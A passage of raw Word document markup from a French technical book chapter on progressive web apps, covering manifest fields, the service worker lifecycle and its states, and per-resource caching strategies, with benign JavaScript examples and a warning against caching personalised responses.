                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>start_url</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3094"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Page d'ouverture</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Hors du périmètre</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="296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scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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Portée du service worker</w:t>
            </w:r>
          </w:p>
        </w:tc>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Trop large</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2960"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>display</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3094"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Barre d'adresse masquée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2960"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>browser</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> par défaut</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="296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purpose: maskable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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Icône adaptée aux masques</w:t>
            </w:r>
          </w:p>
        </w:tc>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Bords rognés</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L'ICÔNE MASKABLE ÉVITE LES COINS ROGNÉS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Les systèmes appliquent un masque de forme variable. Une icône déclarée </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>maskable</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> doit garder son contenu dans un cercle de sécurité couvrant 80 % de la surface, sinon les bords sont coupés.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>41.3 Le cycle de vie du service worker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un service worker passe par installation, activation, puis contrôle des pages. Tant qu'une ancienne version est active, la nouvelle attend : c'est ce qui permet de ne pas casser une session en cours.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3238500"/>
            <wp:docPr id="52" name="Picture 52"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f50.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId78"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3238500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.50 — Le cycle de vie</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un enregistrement prudent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enregistrement.js — chargé par la page</w:t>
        <w:br/>
        <w:t>if ("serviceWorker" in navigator) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  window.addEventListener("load", async () =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    const enregistrement = await navigator.serviceWorker.register("/sw.js", {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      scope: "/",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    });</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    enregistrement.addEventListener("updatefound", () =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      const nouveau = enregistrement.installing;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      nouveau.addEventListener("statechange", () =&gt; {</w:t>
        <w:br/>
        <w:t>if (nouveau.state === "installed" &amp;&amp; navigator.serviceWorker.controller) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">          afficherBandeauMiseAJour();</w:t>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
        <w:br/>
        <w:t xml:space="preserve">      });</w:t>
        <w:br/>
        <w:t xml:space="preserve">    });</w:t>
        <w:br/>
        <w:t xml:space="preserve">  });</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Installation et nettoyage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sw.js — installation et activation</w:t>
        <w:br/>
        <w:t>const CACHE = "carnet-v3";</w:t>
        <w:br/>
        <w:t>const RESSOURCES = ["/", "/styles.css", "/app.js", "/hors-ligne.html"];</w:t>
        <w:br/>
        <w:br/>
        <w:t>self.addEventListener("install", (evenement) =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  evenement.waitUntil(</w:t>
        <w:br/>
        <w:t xml:space="preserve">    caches.open(CACHE).then((cache) =&gt; cache.addAll(RESSOURCES))</w:t>
        <w:br/>
        <w:t xml:space="preserve">  );</w:t>
        <w:br/>
        <w:t>});</w:t>
        <w:br/>
        <w:br/>
        <w:t>self.addEventListener("activate", (evenement) =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  evenement.waitUntil(</w:t>
        <w:br/>
        <w:t xml:space="preserve">    caches.keys().then((noms) =&gt;</w:t>
        <w:br/>
        <w:t>Promise.all(noms.filter((n) =&gt; n !== CACHE).map((n) =&gt; caches.delete(n)))</w:t>
        <w:br/>
        <w:t xml:space="preserve">    )</w:t>
        <w:br/>
        <w:t xml:space="preserve">  );</w:t>
        <w:br/>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.135 — Cinq états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5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État</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="318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Signification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="33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Action possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2519"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>installing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3181"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Installation en cours</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3314"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Aucune</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="251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installed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="318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Prêt mais en attente</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="33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Proposer la mise à jour</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2519"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>activating</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3181"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Nettoyage en cours</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3314"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Aucune</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="251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activated</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="318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Contrôle les pages</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="33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Normal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2519"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>redundant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3181"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Remplacé ou échoué</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3314"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Réenregistrer</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NE SAUTEZ PAS `SKIPWAITING` SANS RÉFLÉCHIR</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>self.skipWaiting()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> active immédiatement la nouvelle version. Une page ouverte peut alors charger des ressources d'une version différente de son HTML. Demandez confirmation à l'utilisateur avant de basculer.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>41.4 Stratégies de cache</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Chaque type de ressource appelle une stratégie distincte. Appliquer la même règle partout produit soit des versions figées, soit aucun hors-ligne.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.136 — Cinq stratégies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Stratégie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Comportement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="257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Adaptée à</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3219"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Cache d'abord</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Cache, sinon réseau</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Polices, icônes, styles</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Réseau d'abord</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Réseau, sinon cache</w:t>
            </w:r>
          </w:p>
        </w:tc>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Pages éditoriales</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3219"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Réseau seul</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Jamais de cache</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Données personnelles</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Cache seul</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Cache, erreur sinon</w:t>
            </w:r>
          </w:p>
        </w:tc>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Ressources de version</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3219"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Périmé pendant revalidation</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Cache immédiat puis mise à jour</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Images</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux stratégies côte à côte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Interception avec stratégies différenciées</w:t>
        <w:br/>
        <w:t>self.addEventListener("fetch", (evenement) =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const url = new URL(evenement.request.url);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if (evenement.request.method !== "GET") return;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  // Données personnelles : jamais de cache</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if (url.pathname.startsWith("/api/")) return;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  // Ressources statiques : cache d'abord</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if (/\.(css|js|png|svg|woff2)$/.test(url.pathname)) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    evenement.respondWith(cacheDAbord(evenement.request));</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  // Pages : réseau d'abord, secours hors-ligne</w:t>
        <w:br/>
        <w:t xml:space="preserve">  evenement.respondWith(reseauDAbord(evenement.request));</w:t>
        <w:br/>
        <w:t>});</w:t>
        <w:br/>
        <w:br/>
        <w:t>async function cacheDAbord(requete) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const cache = await caches.open(CACHE);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const reponse = await cache.match(requete);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  return reponse ?? fetch(requete);</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>async function reseauDAbord(requete) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  try {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    const reponse = await fetch(requete);</w:t>
        <w:br/>
        <w:t xml:space="preserve">    const cache = await caches.open(CACHE);</w:t>
        <w:br/>
        <w:t xml:space="preserve">    cache.put(requete, reponse.clone());</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return reponse;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  } catch {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    const cache = await caches.open(CACHE);</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return (await cache.match(requete)) ?? caches.match("/hors-ligne.html");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>}</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NE METTEZ JAMAIS EN CACHE UNE RÉPONSE PERSONNALISÉE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Une page de compte mise en cache peut être servie à un autre utilisateur sur un appareil partagé. Les réponses authentifiées ne passent pas par le cache, ou sont isolées par utilisateur avec une durée très courte.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>41.5 Hors-ligne utile</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
